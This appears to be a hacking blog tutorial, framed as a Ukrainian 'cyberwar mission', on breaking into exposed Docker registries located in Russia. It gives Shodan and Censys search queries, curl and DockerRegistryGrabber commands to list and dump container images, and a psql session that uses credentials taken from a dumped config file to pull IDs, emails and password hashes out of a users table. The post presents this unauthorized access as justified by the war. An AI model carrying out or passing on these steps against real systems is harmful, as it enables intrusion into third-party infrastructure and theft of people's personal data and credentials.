top of page
Search
Writer's pictureotw

Cyberwar Mission 2: Reconnaissance in the Adversary's Docker Images

Updated: Aug 8

Welcome back, my aspiring cyberwarriors!


In this series, Aircorridor, our man in Ukraine, takes you along on his real-life cyberwar missions in the war against the brutal Russian war machine. Come along and enjoy and learn as he uses his budding cyberwar skills to help save his nation from Putin and his kleptocrat cronies!





The Mission


Listen up, private. As Master OTW says, "only a fool goes to battle without adequate reconnaissance." Therefore, today we will focus all our efforts on conducting an effective information gathering in the Amazon Elastic Container Registry (Amazon ECR).




Amazon ECR is a fully managed Docker container registry service that simplifies the storage, management, and deployment of container images. ECR allows all developers to save configurations and quickly move them into a production environment, thus reducing overall workloads. It's worth checking the registry because inconsiderate developers can leave confidential information.


Key points of how ECR works:


  1. ECR provides a managed Docker registry within an AWS account.

  2. It uses repositories to organize container images.

  3. Authentication is handled through AWS IAM.

  4. Images are pushed and pulled using standard Docker commands after authentication.

  5. ECR offers additional features like automatic image scanning and lifecycle policies.

  6. It integrates closely with other AWS services, particularly ECS (Elastic Container Service) and EKS (Elastic Kubernetes Service).


The URL to access the Amazon Elastic Container Registry (ECR) has the following format:


https://{account_id}.dkr.ecr.{region}.amazonaws.com/{repository_name}


We can also find Russian servers running Docker Registry using Shodan:


port:5000 country: "RU" product: "Docker Registry HTTP API".



This can also be done through Censys: ((Docker Registry) and services.port=`5000`) and location.country=`Russia`



To make sure it's the Docker registry, we can run an nmap scan:



To check if the registry requires authorization, we can run a simple curl command:


kali> curl -k http://<IP>:5000/v2/_catalog



If authorization is not configured, we can get a list of all repositories:



To analyze the image, you can use DockerRegistryGrabber to dump its contents. Here's how to install this tool:



kali> cd DockerRegistryGrabber


kali> python -m pip install -r requirements.txt


You can list available images with the following command:


kali> python drg.py http://<IP> --list




After that, you can dump one of the images or all of them:


kali> python drg.py http://<IP> --dump <name>


To extract all images, use the --dump_all flag.



You can find the dumps in the directory of this tool:



Inside, you will see various archives where important information can be stored:



For example, a snapshot of one of the Java application modules was found in this way.



It contained a configuration file with database connection data:



To connect, I used the following command:


kai l> psql -h <IP> -p <port>-U <user> -d <database>



Listed all tables: host: \dt



Listed all data from the users table: host: SELECT * FROM users;




IDs, names, emails, and password hashes - everything is available.


Summary:


Hacking is THE Most Important Skillset in the 21st Century! Hacking skills, like any skill set, can be used for good or bad. When you nation is under attack from a superior and brutal dictator like Putin, it may be necessary to use your skills to save your nation.


Keep learning and improving. Docker is gaining popularity all the time, but security is not always the first priority for developers. Therefore, this is another important technology in your arsenal.


bottom of page